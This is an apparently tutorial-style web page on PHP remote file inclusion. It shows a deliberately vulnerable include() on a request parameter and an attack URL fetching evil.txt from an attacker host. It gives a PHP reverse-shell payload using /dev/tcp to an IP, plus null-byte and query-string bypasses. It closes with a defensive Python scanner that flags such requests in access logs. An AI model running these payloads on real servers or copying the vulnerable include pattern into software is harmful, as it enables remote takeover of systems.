SMK Muhammadiyah 2 Palembang

Remote File Inclusion

Remote file inclusion uses pretty much the same vector as local file inclusion.

A remote file inclusion vulnerability lets the attacker execute a script on the target machine even though the script is not hosted on that machine.

RFIs are less common than LFIs, because in order for them to work the developer must have edited the php.ini configuration file.

This is how they work.

Say you have an unsanitized parameter, like this:

$incfile = $_REQUEST["file"];
include($incfile.".php");

Now you can include a file that is hosted not on the victim server but on the attacker's server.

http://example.com/index.php?file=http://attackerserver.com/evil.txt

And evil.txt will look something like this:

<?php echo shell_exec("whoami");?>

# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>

So when the victim server includes this file, it automatically executes the commands in evil.txt, and we have RCE.

Avoid extensions

Remember to add the null byte %00 to avoid appending .php. This only works on PHP before version 5.3.

If that does not work, you can also add a ?. This way the rest will be interpreted as URL parameters.
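From the defender's side, the requests described above leave a recognisable trace in web server access logs. The following is an added example, not part of the original page: it decodes each query parameter and flags values that point at another host, noting whether the null byte or ? suffix was used. The log lines, addresses and the attacker.example hostname are constructed, and ftp is included as a generalization beyond the http case shown on the page.

```python
import re
from urllib.parse import parse_qsl

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter values that point include() at another host (ftp added as a generalization).
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample log lines; addresses and hostnames are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?file=about HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=http://attacker.example/evil.txt HTTP/1.1" 200 87',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?file=http%3A%2F%2Fattacker.example%2Fevil.txt%00 HTTP/1.1" 200 87',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?file=HTTP://attacker.example/evil.txt? HTTP/1.1" 200 87',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?file=../../etc/passwd HTTP/1.1" 200 40',
]


def find_rfi_attempts(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        # parse_qsl percent-decodes, so encoded schemes and %00 are seen in clear.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE.match(value):
                continue
            if "\x00" in value:
                suffix_trick = "null-byte"      # truncates the appended .php (PHP < 5.3)
            elif "?" in value:
                suffix_trick = "query-string"   # appended .php becomes a URL parameter
            else:
                suffix_trick = None
            findings.append({
                "client": line.split()[0],
                "path": path,
                "param": name,
                "value": value,
                "suffix_trick": suffix_trick,
            })
    return findings


if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

Any parameter that legitimately carries a URL, such as a redirect target, is flagged as well, so findings need triage against the application's known parameters.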


Last updated 2 years ago